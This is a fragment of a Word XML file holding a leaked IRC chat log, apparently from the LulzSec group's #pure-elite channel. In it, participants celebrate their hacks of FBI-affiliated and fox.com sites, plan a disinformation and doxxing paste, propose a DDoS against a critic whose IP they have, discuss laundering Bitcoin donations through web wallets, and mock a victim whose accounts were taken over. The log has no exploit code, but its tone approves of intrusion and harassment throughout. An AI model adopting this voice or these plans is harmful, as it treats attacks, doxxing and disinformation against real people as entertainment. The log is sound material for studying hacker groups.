      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 07:18:38 lol i was parr0t ;3 Jun 04 07:21:17 * t[2] is now known as Topiary Jun 04 07:21:20 * Topiary has quit (Quit: --&gt;) Jun 04 07:21:26 * Topiary (t@HA-5u1.rkn.75e5ku.IP) has joined #pure-elite Jun 04 07:21:36 Topiary exciting and new Jun 04 07:24:21 Topiary You have 38,739 followers Jun 04 07:24:34 Topiary http://pastebin.com/trends Jun 04 07:24:48 tflow we should really probably make a pastebin account Jun 04 07:25:10 tflow but already taken Jun 04 07:25:18 tflow http://pastebin.com/u/lulzsec Jun 04 07:32:13 joepie91 @2600 Jun 04 07:32:14 joepie91 2600 Magazine Jun 04 07:32:14 joepie91 Hacked websites, corporate infiltration/scandal, IRC wars, new hacker groups making global headlines - the 1990s are back! Jun 04 07:32:14 joepie91 lol Jun 04 07:32:32 joepie91 also Jun 04 07:32:38 joepie91 fucking lol'd @ norton comment Jun 04 07:36:03 joepie91 LOL Jun 04 07:36:10 joepie91 did you guys notice how practically noone reported on the FBI hack?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 07:36:19 tflow that's because it's saturday Jun 04 07:36:26 tflow same thing happened with acs law Jun 04 07:36:31 tflow we released on friday Jun 04 07:36:35 tflow 0 reports Jun 04 07:36:38 tflow then come monday Jun 04 07:36:41 tflow 300 reports Jun 04 07:36:52 joepie91 I know Jun 04 07:36:55 joepie91 but even the blogs Jun 04 07:37:01 joepie91 who are usually very quick with reporting on things Jun 04 07:37:08 joepie91 haven't really written shit so far :p Jun 04 07:37:13 tflow true Jun 04 07:37:18 tflow like kerbs hasn't reported it yet Jun 04 07:37:23 tflow although sophos has Jun 04 07:37:27 Topiary a few have written on us Jun 04 07:37:29 joepie91 ya, indeed, I noticed naked security Jun 04 07:37:41 Topiary International Business Times, cnet, Parmy is doing a piece later today Jun 04 07:38:03 Topiary LAtimes Jun 04 07:38:09 joepie91 CNET, LA Times, IB Times, INQUISITR, Sophos Jun 04 07:38:11 joepie91 that's my list atm Jun 04 07:38:34 joepie91 http://www.inquisitr.com/111203/how-to-piss-off- the-fbi-hack-their-buddys-infragard-site/ Jun 04 07:38:39 Topiary yeah Jun 04 07:38:50 joepie91 people should use things like google news more Jun 04 07:38:54 joepie91 broadens their view etc Jun 04 07:39:25 Topiary you know, even without our pastebin being linked on news sites, it still has around 55,000 views Jun 04 07:39:48 joepie91 lol Jun 04 07:42:41 joepie91 "Had we agreed to provide this data to them, LulzSec would have been able to grow the size and scope of their DDoS (distributed denial-of-service) attack and fraud capabilities." Jun 04 07:42:42 joepie91 lol Jun 04 07:42:43 joepie91 wat Jun 04 07:43:26 joepie91 &gt;fraud capabilities Jun 04 07:44:05 Topiary I replied to him Jun 04 07:44:13 Topiary http://pastebin.com/AjVd0L9E Jun 04 07:44:59 joepie91 A Nintendo spokesman released this statement when asked for comment: "The protection of our customer information is our utmost priority. Therefore, we constantly monitor our security. This particular situation was a server configuration issue that we investigated and resolved a few weeks ago. The server contained no consumer information." Jun 04 07:45:00 joepie91 true?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 07:45:25 joepie91 about the server config Jun 04 07:45:42 tflow yes Jun 04 07:45:43 tflow true Jun 04 07:45:48 tflow it wasn't a big hack Jun 04 07:50:35 tflow http://www.gmanews.tv/story/222563/technology/hackers- taunt-fbi-after-hitting-partner-sites Jun 04 07:50:40 tflow LulzSec said that since the Obama administration treats hacking as an act of war, we just hacked an FBI-affiliated website and leaked its user base." Jun 04 07:50:43 tflow I love that line Jun 04 07:52:12 joepie91 my god..... http://codepad.viper-7.com/XeOvIU Jun 04 07:52:21 joepie91 some people should learn to format their fucking code Jun 04 07:52:32 joepie91 I reformatted it for him &gt;.&gt; Jun 04 07:52:34 joepie91 http://codepad.viper-7.com/S0XZCg Jun 04 07:54:13 lol lol Jun 04 07:56:30 joepie91 like, srsly Jun 04 07:56:33 joepie91 that code was just horrible Jun 04 07:56:37 joepie91 and so many fails in such a simple script Jun 04 07:56:38 joepie91 :| Jun 04 07:58:19 joepie91 gave him a link to w3schools Jun 04 07:58:24 joepie91 and told him to learn how to format code Jun 04 07:59:20 lol xD Jun 04 07:59:21 tflow lol why would you want a function that returns 1-3 Jun 04 07:59:29 tflow according to the params Jun 04 07:59:44 tflow script* Jun 04 08:00:13 joepie91 idk Jun 04 08:00:16 joepie91 he's learning javascript Jun 04 08:00:21 joepie91 "from a book" apparently Jun 04 08:00:31 joepie91 which is typically a horrible idea with a language like javascript Jun 04 08:00:41 joepie91 because standards can change quite a lot over a short timespan Jun 04 08:00:54 joepie91 ohwell.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:01:01 joepie91 he's now apparently going to follow the w3schools guide Jun 04 08:01:04 joepie91 instead of the book Jun 04 08:01:06 joepie91 so all will be fine Jun 04 08:01:56 joepie91 whoo Jun 04 08:02:03 joepie91 just found a really clever bit on a forum Jun 04 08:02:05 joepie91 "After uninstalling Firefox 3 times, I finally figured out a way to get rid of Norton. In the Mozilla Firefox components folder there is a file called: coFFPlgn.dll. I overwrote the coFFPlgn.dll with a blank file and then set it to read only. That got rid of the Norton Firefox Tool Bar." Jun 04 08:02:47 tflow that's how i got rid of license scripts on php scripts Jun 04 08:03:43 tflow someone payed me $20 to overwrite a file with blank data once Jun 04 08:03:47 joepie91 lolol Jun 04 08:04:09 joepie91 also, just saying Jun 04 08:04:18 joepie91 http://blockexplorer.com/address/176LRX4WRWD5LWDMbhr94ptb2MW9varCZP Jun 04 08:04:29 joepie91 you could probably write a nice small donation counter using that :) Jun 04 08:22:35 joepie91 http://pastebin.com/rrZDkbp7 Jun 04 08:22:44 joepie91 Avunit Sabu tflow lol Topiary Jun 04 08:22:46 joepie91 read pastebin Jun 04 08:24:18 Topiary see, now that's the entire HBGary crew Jun 04 08:24:21 Topiary so why is your name in it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:25:46 joepie91 probably because I was in the leaked logs? Jun 04 08:25:53 joepie91 anyway, is entropy still here under some nick? Jun 04 08:25:58 Topiary nope Jun 04 08:26:10 joepie91 also, it was tweeted by Awinee Jun 04 08:26:12 joepie91 a few minutes ago Jun 04 08:26:16 Topiary let's just ignore it Jun 04 08:26:21 Topiary been ignoring them all for days Jun 04 08:26:22 joepie91 so I think he just grepped the #hq logs then Jun 04 08:26:38 Topiary it's fine if we just stay here and don't expose ourselves in other locations Jun 04 08:26:41 Topiary they can't do anything Jun 04 08:27:15 * trollpoll (rootgratz@HA-fdp.dgc.42rdv5.IP) has joined #pure-elite Jun 04 08:27:18 lol we should do a mass disinfo campaingn :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:27:19 Topiary 'sides this is Pure Elite not LulzSec, heh luckily our gang of awesome development folks working in side-ops didn't get on that list Jun 04 08:27:28 joepie91 lol Jun 04 08:28:07 lol lets add the lulzsec.com domain adrian lamo owns and awiness dox and some other jesterfags to a pastebin and call it "lulzsec members" then pastebin spam it so it trends like pr0's :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:28:16 trollpoll lol, i was thinking just on this Jun 04 08:28:20 lol or you think doing tht will give them more reason to think it is us?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:28:22 trollpoll but, saying more or less Jun 04 08:28:26 trollpoll that lulzsec is CIA Jun 04 08:28:31 Topiary hmm not sure who IS LulzSec really...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>tflow/Sabu/myself/kayla started it, then tflow was on/off, then Avunit/pwnsauce joined in, then you guys came onboard... :D I guess nobody and everybody Jun 04 08:29:14 Topiary let's spread disinfo about CIA I guess Jun 04 08:29:28 tflow yeah but props to trollpoll for exploiting that fox.com hole Jun 04 08:29:30 trollpoll it makes sense Jun 04 08:29:34 Topiary oh definitely yeah Jun 04 08:29:41 Topiary we have trollpoll to thank for the first hit Jun 04 08:29:49 Topiary very good shit Jun 04 08:30:05 trollpoll not all mine...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:30:14 Topiary word is that you exploited it up nicely Jun 04 08:30:37 trollpoll but i lost the lulz :( Jun 04 08:30:55 Topiary "awinee Awinee Jun 04 08:30:55 Topiary I'll dedicate this day to @avunitanon. @LulzSec watch closely as I sink your humble boat. Nothing personal, just #lulz. Read next tweet.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:30:55 Topiary " Jun 04 08:30:57 Topiary 2 minutes ago Jun 04 08:30:58 * Topiary watches Jun 04 08:31:19 joepie91 well shit Jun 04 08:31:21 joepie91 I have to get bread Jun 04 08:31:25 joepie91 but I dun want to miss the lulz Jun 04 08:31:25 joepie91 :( Jun 04 08:31:49 Topiary Awinee has no fucking idea what the word "humble" means Jun 04 08:32:16 joepie91 maybe you should tell him about the humble bundle Jun 04 08:32:20 Topiary he's not charismatic, he's not skilled, he's not funny, he's not smart, he's ugly and out of shape, and he wakes up at 2 in the afternoon every day Jun 04 08:32:22 joepie91 for further confuse :D Jun 04 08:32:22 * Topiary shakes head Jun 04 08:32:23 Topiary poor boy Jun 04 08:33:55 trollpoll Topiary, about CIA, will make sense to ppl, cos in fact makes sense to me Jun 04 08:34:18 trollpoll as far as i know, one of you could be some CIA guy Jun 04 08:34:36 Topiary it's true Jun 04 08:34:36 trollpoll using "hackers" to their benefits Jun 04 08:34:48 trollpoll attacking iran Jun 04 08:34:57 trollpoll lybia Jun 04 08:35:00 trollpoll or whatever Jun 04 08:35:04 trollpoll is CIA style Jun 04 08:35:17 trollpoll also, makes the hackers thing they are freelance :) Jun 04 08:35:39 trollpoll but ey, if one of you is a cia guy... cmon, no problem, we are for lulz xD Jun 04 08:35:52 Topiary if I were CIA I'd certainly be looking for a crew like this Jun 04 08:36:03 trollpoll sure Jun 04 08:36:05 Topiary seriously if you gave us all a schedule, office building, and paycheques Jun 04 08:36:09 Topiary we'd just destroy the world Jun 04 08:36:36 trollpoll well, in a not far future, perhaps we will end at it... Jun 04 08:36:57 Topiary hehe Jun 04 08:37:00 trollpoll i mean... the whitehat security companies started like this...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:37:26 Topiary don't even know why I've got a tab open on @Awinee and his twitter feed, here comes the failed d0x...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:38:18 Topiary I really hope one of you is awinee so everyone can have something fun to read Jun 04 08:38:25 Topiary maybe Gawker will go over our logs and make a lame story Jun 04 08:39:05 tflow gawker is a joke Jun 04 08:39:18 tflow their design made them lose alot of their visitors Jun 04 08:39:19 Topiary tflow: did you see Chen's tweet about us being HBGay crew?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 08:39:25 tflow completely dropped them out of google news Jun 04 08:39:25 tflow yeah Jun 04 08:41:48 tflow we could just ddos him Jun 04 08:41:51 tflow we have his ip Jun 04 09:01:22 tflow i love this guy Jun 04 09:01:23 tflow http://www.youtube.com/watch?v=59Wm00Q6s7c Jun 04 09:02:09 tflow the same guy like 5 years later: http://www.youtube.com/watch?v=G5v0kwXapt0 Jun 04 09:21:53 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 09:22:14 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 04 09:35:47 joepie91 Clever (Score:1) Jun 04 09:35:47 joepie91 by asto21 (1797450) Jun 04 09:35:47 joepie91 Take a site down first and then make sure it stays down by slashdotting it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:35:50 joepie91 lolol Jun 04 09:37:10 tflow where's that?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:38:06 joepie91 slashdot Jun 04 09:38:08 joepie91 it's frontpage Jun 04 09:38:10 joepie91 right now Jun 04 09:38:14 joepie91 like, top article Jun 04 09:38:22 tflow ah lol Jun 04 09:38:24 joepie91 also, either slashdot and boingboing are having issues Jun 04 09:38:28 joepie91 or I am getting ddos _again_ Jun 04 09:39:00 &lt;hsien&gt; yo Jun 04 09:39:19 * hsien gives channel operator status to joepie91 lol tflow storm Topiary trollpoll Jun 04 09:39:47 joepie91 my laptop doesn't get +o? :( Jun 04 09:39:55 joepie91 :P Jun 04 09:39:56 Topiary your laptop is a terrorist Jun 04 09:40:04 joepie91 terrorists don't run on Pentium 3s Jun 04 09:40:20 * joepie91 gives channel operator status to joepie91_laptop Jun 04 09:42:55 joepie91 so Jun 04 09:43:05 joepie91 VPN Jun 04 09:43:09 joepie91 recommendations?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:43:10 joepie91 inb4 HMA Jun 04 09:43:13 Topiary HMA Jun 04 09:44:00 joepie91 lol Jun 04 09:44:04 joepie91 what are the speeds on HMA?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:44:20 joepie91 like, will I be able to burst the full 1,8MB/sec of my connection?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:45:10 Topiary I believe you'll manage Jun 04 09:45:21 Topiary also, I just got a 32GB MicroSD for 40 Jun 04 09:45:51 Topiary first I thought it would totally be a scam and would be one of those shitty 1GBs Jun 04 09:45:53 Topiary just plugged it in Jun 04 09:45:57 Topiary 29.7GB :D Jun 04 09:46:05 joepie91 microsd isn't very expensive Jun 04 09:46:07 joepie91 but Topiary Jun 04 09:46:10 joepie91 what kind of speeds do you get?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:46:13 * lol has quit (Ping timeout: 121 seconds) Jun 04 09:46:27 Topiary I'm running on 4mbps here and it maxes that Jun 04 09:46:36 joepie91 mmm Jun 04 09:46:40 joepie91 oh Jun 04 09:46:42 joepie91 fuck Jun 04 09:46:43 joepie91 liberty reserve Jun 04 09:46:44 joepie91 is shitty Jun 04 09:46:46 joepie91 beyond belief Jun 04 09:47:22 Topiary Account Balance is: 25.09 BTC (429.04 USD @ 17.10) Jun 04 09:47:23 Topiary u jelly?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:47:49 joepie91 http://bitpoll.dyndns.org/?poll=3 Jun 04 09:47:50 joepie91 u jelly?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:48:21 joepie91 and no I don't have all those bitcoins anymore :P Jun 04 09:48:33 * lol (lol@HA-q3c.mcg.9puaba.IP) has joined #pure-elite Jun 04 09:48:46 tflow i bet you wish you kept them Jun 04 09:48:49 Topiary I sent you 0.3 Jun 04 09:48:52 Topiary on tflow's /r/ Jun 04 09:49:11 joepie91 tflow: yes, but I had bills to pay Jun 04 09:49:12 joepie91 sadly Jun 04 09:49:18 joepie91 Topiary: :D Jun 04 09:49:23 * joepie91 tries to find transaction Jun 04 09:49:37 Topiary 2011-06-03 15:11:17 coingobbler 1PPVupRRz7tH... - 0.30 Jun 04 09:49:37 joepie91 17:24 yesterday Jun 04 09:49:39 joepie91 (my time) Jun 04 09:49:49 Topiary our biggest single donation: Jun 04 09:49:50 joepie91 oh lolwut Jun 04 09:49:50 Topiary 2011-06-04 05:19:14 Bitcoin P2P Network coingobbler 13.40 Jun 04 09:49:52 joepie91 time difference Jun 04 09:49:55 joepie91 and wut dat Jun 04 09:50:01 tflow If I kept that 25 bc you gave me 2 months ago, I'd be like $300 richer Jun 04 09:50:05 Topiary someone sent us 150USD in one donation Jun 04 09:50:06 joepie91 lol Jun 04 09:50:11 joepie91 lolwat Jun 04 09:50:15 joepie91 nice Jun 04 09:50:20 Topiary time to spam your asses Jun 04 09:50:21 Topiary 2011-06-04 13:40:07 Bitcoin P2P Network coingobbler 0.05 Jun 04 09:50:21 Topiary 2011-06-04 12:38:23 Bitcoin P2P Network coingobbler 0.52 Jun 04 09:50:21 Topiary 2011-06-04 05:19:14 Bitcoin P2P Network coingobbler 13.40 Jun 04 09:50:21 Topiary 2011-06-04 04:16:58 Bitcoin P2P Network coingobbler 0.01 Jun 04 09:50:21 Topiary 2011-06-04 02:19:00 Bitcoin P2P Network coingobbler 1.90 Jun 04 09:50:22 Topiary 2011-06-04 01:15:16 Bitcoin P2P Network coingobbler 1.00 Jun 04 09:50:24 Topiary 2011-06-03 18:03:53 Bitcoin P2P Network coingobbler 0.99 Jun 04 09:50:26 Topiary 2011-06-03 15:11:17 coingobbler 1PPVupRRz7tH... - 0.30 Jun 04 09:50:28 Topiary 2011-06-03 10:49:24 Bitcoin P2P Network coingobbler 2.01 Jun 04 09:50:30 Topiary 2011-06-03 08:50:34 Bitcoin P2P Network coingobbler 0.02 Jun 04 09:50:32 Topiary 2011-06-03 07:51:23 Bitcoin P2P Network coingobbler 1.00 Jun 04 09:50:34 Topiary 2011-06-03 05:57:29 Bitcoin P2P Network coingobbler 0.06 Jun 04 09:50:38 Topiary 2011-06-03 05:02:08 Bitcoin P2P Network coingobbler 0.55 Jun 04 09:50:39 joepie91 just curious... why are you using a web wallet? Jun 04 09:50:40 Topiary 2011-06-03 03:02:08 Bitcoin P2P Network coingobbler 0.01 Jun 04 09:50:42 Topiary 2011-06-03 02:06:34 Bitcoin P2P Network coingobbler 0.12 Jun 04 09:50:44 Topiary 2011-06-02 22:13:15 Bitcoin P2P Network coingobbler 3.26 Jun 04 09:50:46 Topiary 2011-06-02 22:13:14 Bitcoin P2P Network coingobbler 0.04 Jun 04 09:50:48 Topiary 2011-05-31 04:11:41 Bitcoin P2P Network CoinGobbler 0.05 Jun 04 09:50:50 Topiary 2011-05-31 02:46:10 Bitcoin P2P Network CoinGobbler 0.03 Jun 04 09:50:52 Topiary 2011-05-30 23:22:21 Bitcoin P2P Network CoinGobbler 0.02 Jun 04 09:50:54 Topiary 2011-05-28 22:34:45 Bitcoin P2P Network CoinGobbler 0.05 Jun 04 09:50:56 Topiary 2011-05-28 22:06:44 1NFEkB8NYkLS... CoinGobbler 0.26 Jun 04 09:50:58 Topiary 2011-05-13 19:30:28 Bitcoin P2P Network CoinGobbler 0.02 Jun 04 09:51:00 Topiary 2011-05-04 04:43:20 Bitcoin P2P Network CoinGobbler 0.02 Jun 04 09:51:02 Topiary om nom nom nom goins Jun 04 09:51:04 Topiary because client = IP Jun 04 09:51:09 joepie91 true Jun 04 09:51:17 joepie91 but Jun 04 09:51:18 Topiary I don't buy anything with this wallet Jun 04 09:51:21 joepie91 that doesn't make it traceable Jun 04 09:51:21 joepie91 afaik Jun 04 09:51:25 Topiary if we need to buy things, I shift it to someone else Jun 04 09:51:41 joepie91 everyone "has" the coins, but you can only "use" them if you have the private key of the address Jun 04 09:51:58 joepie91 so you can't see "oh this transaction went to IP X" Jun 04 09:52:12 joepie91 it's like you have the key, and noone knows you do Jun 04 09:52:15 joepie91 someone makes a chest with money Jun 04 09:52:21 joepie91 gives everyone a copy of that chest Jun 04 09:52:26 joepie91 but you are the only one who can open the chest as you have the key Jun 04 09:52:37 joepie91 however, noone knows you have the key, nor that you opened the chest Jun 04 09:53:08 joepie91 at least that is my understanding of how it works :P Jun 04 09:54:47 joepie91 goddamnit Jun 04 09:54:48 joepie91 http://members.shaw.ca/gf3/circle-the-cat.html Jun 04 09:56:42 tflow i remember playing that a few years ago Jun 04 09:56:55 Avunit i has it Jun 04 09:56:57 Avunit finally Jun 04 09:56:59 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 09:56:59 Avunit bitch cat D: Jun 04 09:57:04 joepie91 lolol Jun 04 09:57:10 joepie91 Avunit: you won?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 09:57:14 Avunit yesh Jun 04 09:57:20 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 04 09:57:27 Avunit after 6 tries D: Jun 04 09:57:35 joepie91 jesus Jun 04 09:57:36 joepie91 you're good Jun 04 09:57:48 Avunit well Jun 04 09:57:50 Avunit i failed hard again now Jun 04 09:58:21 Avunit argh so close now :( Jun 04 09:58:45 Avunit ah got it again Jun 04 09:59:18 joepie91 lolwat Jun 04 09:59:19 joepie91 you are good Jun 04 09:59:41 Avunit imma upload pic Jun 04 09:59:42 Avunit secs Jun 04 09:59:53 Avunit before i ensnare it Jun 04 10:00:36 Avunit http://i.imgur.com/NrQWr.jpg Jun 04 10:00:46 Avunit gotta use those green dots you start out with Jun 04 10:01:39 joepie91 FUCKING CAT Jun 04 10:01:40 joepie91 I know Jun 04 10:01:51 joepie91 but I can't win it Jun 04 10:01:51 joepie91 D: Jun 04 10:01:57 Avunit lolwat Jun 04 10:02:02 Avunit only 3 darkgreen dots nao Jun 04 10:02:06 joepie91 I tried like 20 times Jun 04 10:02:08 joepie91 couldn't win Jun 04 10:02:09 Avunit the challenge is accepted D: Jun 04 10:02:09 joepie91 I sad nao :( Jun 04 10:02:13 joepie91 and lol Jun 04 10:02:23 Avunit wut its not running away from my cricle Jun 04 10:02:25 Avunit in previous tries Jun 04 10:02:30 Avunit it like ran the opposite direction Jun 04 10:02:37 Avunit of where id put the first circle Jun 04 10:02:38 joepie91 also Jun 04 10:02:38 joepie91 http://pete.com/files/photos/challenge-denied.jpg Jun 04 10:02:43 Avunit so id drive im to the nearest cluster Jun 04 10:02:46 Avunit now it just ran past it D: Jun 04 10:02:48 joepie91 lol Jun 04 10:02:51 joepie91 but look at that image Jun 04 10:03:04 Avunit ACCEPTED Jun 04 10:04:17 joepie91 http://pete.com/view/during-a-blackout Jun 04 10:05:29 Avunit haha Jun 04 10:07:44 joepie91 you know Jun 04 10:07:50 joepie91 people are seriously supportive of lulzsec it seems Jun 04 10:07:53 joepie91 like Jun 04 10:07:59 joepie91 they somehow seem to support lulzsec more than anonymous Jun 04 10:08:12 lol lol Jun 04 10:08:12 joepie91 which is Jun 04 10:08:14 joepie91 interesting Jun 04 10:08:18 joepie91 seeing as the most heard argument was Jun 04 10:08:23 joepie91 BUT THEY ARE COMMITTING CRIMES!!1!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 10:08:29 Avunit yeah but it is mainly because we dont really use any shitty motives n stuff its just lulz and i mean Jun 04 10:08:31 Avunit everyone had to laugh Jun 04 10:08:35 Avunit when tupac was ressurected Jun 04 10:08:49 trollpoll lol Jun 04 10:08:51 joepie91 yes, but the "it's a crime" argument goes here as well Jun 04 10:08:59 joepie91 so it would make no sense to judge anon based on that argument Jun 04 10:08:59 Avunit yeah but everyone found it funny :p Jun 04 10:09:03 joepie91 if you don't do the same for lulzsec Jun 04 10:09:04 joepie91 :p Jun 04 10:09:14 joepie91 tl;dr people are hypocritical and have double standards Jun 04 10:09:15 joepie91 what's new Jun 04 10:09:26 Avunit that is from an objective, non brain interferance point of view Jun 04 10:09:45 joepie91 @ekgibson Jun 04 10:09:45 joepie91 Emily Gibson Jun 04 10:09:45 joepie91 @LulzSec You proved your point, but did you have to publish everything? Thanks for fucking my day. Fb, amazon,everything hacked. Kiss my ass Jun 04 10:09:46 joepie91 lol Jun 04 10:09:52 joepie91 shouldnthavereusedpasswords.jpeg Jun 04 10:10:02 lol lol Jun 04 10:10:04 lol :D Jun 04 10:10:10 Avunit tis just like saying you dont discriminate but scientifically its proven that one simply looks at some things like colour, weight, build etc. first :P Jun 04 10:10:12 lol should make tht an actual image xD Jun 04 10:10:39 joepie91 lol Jun 04 10:10:58 joepie91 Avunit: humans aren't perfect.. but if you are aware of that...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 10:11:03 joepie91 then don't claim you are Jun 04 10:11:06 joepie91 as in Jun 04 10:11:23 joepie91 if you like what lulzsec does, but not what anon does, then don't use the "it's a crime" argument at all Jun 04 10:11:44 joepie91 on another note, lulzsec has turned quite some attention to cloudflare and bitcoin it seems :p Jun 04 10:11:47 Avunit Most people are not aware or dont want to be :/ Which is not necessarily bad Jun 04 10:11:59 Avunit and awinee is promoting avunit.com! :O Jun 04 10:12:08 Avunit So i know Jun 04 10:12:11 Avunit we save money Jun 04 10:12:21 Avunit and then we make a tv commercial with shouldnthavereusedpassword.jpeg to inform the public! :D Jun 04 10:13:40 joepie91 lol Jun 04 10:14:03 joepie91 god Jun 04 10:14:09 joepie91 gawker couldnt possible have made a worse picture mashup Jun 04 10:14:11 joepie91 for their article Jun 04 10:14:13 joepie91 http://gawker.com/5808517/lulzsec-hackers-go-after- 